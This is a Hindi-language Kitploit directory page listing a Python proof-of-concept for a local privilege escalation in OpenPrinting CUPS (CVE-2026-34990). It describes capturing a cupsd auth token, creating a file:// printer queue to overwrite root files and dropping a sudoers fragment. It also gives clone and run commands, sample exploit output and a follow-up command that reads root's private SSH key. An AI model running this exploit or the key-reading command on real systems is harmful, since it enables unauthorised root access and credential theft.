Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-34990 — OpenPrinting CUPS में CVE-2026-34990 के लिए Python proof-of-concept, जो cupsd को एक Local auth token लीक करने और file:// printer queue के माध्यम से root फ़ाइलों को overwrite करने के लिए coerces करता है। | Kitploit
उपकरण/GitHubGitHub/ungabunga-ctf/cve-2026-34990
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणसुरक्षा वर्चुअलाइजेशनपेनिट्रेशन टेस्टिंग
GitHubungabunga-ctf/cve-2026-34990

CVE-2026-34990

OpenPrinting CUPS में CVE-2026-34990 के लिए Python proof-of-concept, जो cupsd को एक Local auth token लीक करने और file:// printer queue के माध्यम से root फ़ाइलों को overwrite करने के लिए coerces करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
112 दिन पहलेअभी तक समीक्षित नहीं

CVE-2026-34990

विवरण

CVE-2026-34990 - OpenPrinting CUPS संस्करण 2.4.16 और उससे पहले के संस्करणों में, एक स्थानीय गैर-विशेषाधिकार प्राप्त उपयोगकर्ता cupsd को एक पुन: प्रयोज्य Authorization: Local ... टोकन के साथ हमलावर-नियंत्रित localhost IPP सेवा में प्रमाणित करने के लिए विवश कर सकता है। वह टोकन localhost पर /admin/ अनुरोधों को चलाने के लिए पर्याप्त है, और हमलावर CUPS-Create-Local-Printer को printer-is-shared=true के साथ जोड़कर एक file:///... कतार को बनाए रख सकता है, भले ही सामान्य FileDevice नीति ऐसे URI को अस्वीकार करती है। उस कतार में प्रिंट करने से मनमाना root फ़ाइल ओवरराइट होता है; नीचे दिया गया PoC उस आदिम विधि का उपयोग करके एक sudoers फ़्रैगमेंट छोड़ता है और root कमांड निष्पादन प्रदर्शित करता है। प्रकाशन के समय, कोई सार्वजनिक रूप से उपलब्ध पैच नहीं हैं।

इंस्टॉल करें

git clone https://github.com/ungabunga-ctf/CVE-2026-34990
cd CVE-2026-34990

चलाएँ

python3 CVE-2026-34990.py

उदाहरण

python3 CVE-2026-34990.py
CVE-2026-34990 CUPS PoC
[*] Target file: /etc/sudoers.d/aporter
[*] Starting token capture server...
[+] Captured Local token: 7BD0ECC9D367025E50774E0BB08F7B5E
[*] Creating file:// printer...
[+] Vulnerable!
...
...

फिर:

sudo -n cat /root/.ssh/id_rsa
टूल डाउनलोड करें